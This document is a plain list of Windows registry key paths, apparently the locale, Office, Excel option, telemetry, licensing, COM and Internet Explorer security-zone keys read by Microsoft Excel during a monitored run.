HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-PR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bs-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bs-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bs-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bs-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\smn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\smn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\az-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\az-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sms
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sms
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bs
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bs
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\az-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\az-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sma
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sma
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uz-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uz-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mn-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mn-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\iu-Cans
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\iu-Cans
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-Hant
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-Hant
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tg-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tg-Cyrl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dsb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dsb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\smj
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\smj
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uz-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uz-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mn-Mong
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mn-Mong
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\iu-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\iu-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tzm-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tzm-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ha-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ha-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\(Default)
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\Migration\Excel
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\Migration\Excel\BypassMigration
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\Migration\Excel\UpgradeVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\Migration\Excel\Lang
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Access_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Ace_OdbcCurrentUser\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Excel_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Excel_Intl\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Graph_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_CoreReg\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_Intl\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToIEAddin\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToWordAddin\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\outexum\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Intl\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Word_Core\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Word_Intl\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler\Order
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Ace_OdbcCurrentUser\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Ace_OdbcCurrentUser\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Excel_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Excel_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Intl\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Graph_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Graph_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_CoreReg\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_CoreReg\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Intl\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToIEAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\OneNoteToIEAddin\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToWordAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\OneNoteToWordAddin\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\outexum\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\outexum\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Intl\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Access_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Access_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Word_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Word_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Word_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Word_Intl\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Maximized
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Pos
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AlertForLargeOperations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LargeOperationCellCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options6
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options95
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OptionFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DDECleaned
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\RecognizeSmartTags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefSheets
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AlertIfNotDefault
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoDec
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MenuKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\StickyPtX
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\StickyPtY
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoChartFontScaling
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CustomSortOrder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MoveEnterDir
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FlashFill
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ExtendList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableFourDigitYearDisplay
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CfDDELink
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NoWideTextRendering
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoRecoverEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoRecoverTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoRecoverDelay
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableNetworkResiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoHyperlink
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoExpandListRange
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoCreateCalcCol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableAutoRepublish
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableAutoRepublishWarning
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Xl9_Hijri
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Jasper
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Detroit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\WarnFuncConflict
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LivePreview
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SuppressDisplayAlerts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableParenFlash
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{531FDEBF-9B4C-4A43-A2AA-960E8FCDC732}\LanguageProfile\0x00000404\{0B883BA0-C1C7-11D4-87F9-0080C882687E}\Enable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\UseOfficeUIFont
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Options\AirspaceDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\UseOnlineContent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\FontInfoCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableADALExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableADAL
HKEY_LOCAL_MACHINE\Software\Microsoft\IdentityCRL\ServiceEnvironment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\NoDomainUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationSignInName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationConfigError
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security\AutomationSecurity
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters\ClientCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\CurrentProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\MaxWords
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\MaxWordsJapan
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\UseOnline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\PreferOffline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\UseMT
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UID
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\RulesRetrievalTimeCap
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration\ProductReleaseIds
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\DisableTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToAsimov
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToFile
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\ULSQueueAbortThreshold
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\excel\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\EcsRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\EdgeRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\excel\FlightNumberlines
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\ConfigIds
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\OldAriaDllDetected
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\ClientSamplingOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\TransportNetworkBackoff
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\AggregatorTimeCap
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\UseBondSerializer
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\TelemetryFileSizeLimit
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\AggregatorAgeLimit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesXmlDir
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\AggregatorSizeLimit
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteTelemetryEventsToAria
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\Language
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\SubscriptionCustomerLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ServerReachabilityTimeout
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableServerReachability
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\ProviderId
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole\MaximumAllowedAllocationSize
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LastUILang
HKEY_CURRENT_USER\Software\Microsoft\Shared\OfficeUILanguage
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\Common\UseAlternateOutlookAppUserModelId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetrySent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbControl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbOn
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbSysIcon
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbTips
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbST
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\ActivityAggregationInterval
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{dcb00c01-570f-4a9b-8d69-199fdba5723b}\InsecureQI
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\LocalService
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\ServiceParameters
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\RemoteServerName
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\DllSurrogate
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{22D2E146-1A68-40B8-949C-8FD848B415E6}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{2ABC0864-9677-42E5-882A-D415C556C284}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Deprecated
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\NextUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\NotificationsNeverShowAgainLanguages
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\DisableBackgrounds
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PendingUITheme
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\UI Theme
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SendCustomerData
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\NexusRulesEndpoint
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\NexusV3Endpoint
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\System\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\Software\Microsoft\OfficeSoftwareProtectionPlatform\Path
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\EXCEL.EXE
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\Policies\0ff1ce15-a989-479d-af46-f275c6370663\Value
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Viewer
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LicenseAggregateSubscription
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ConvertDocument
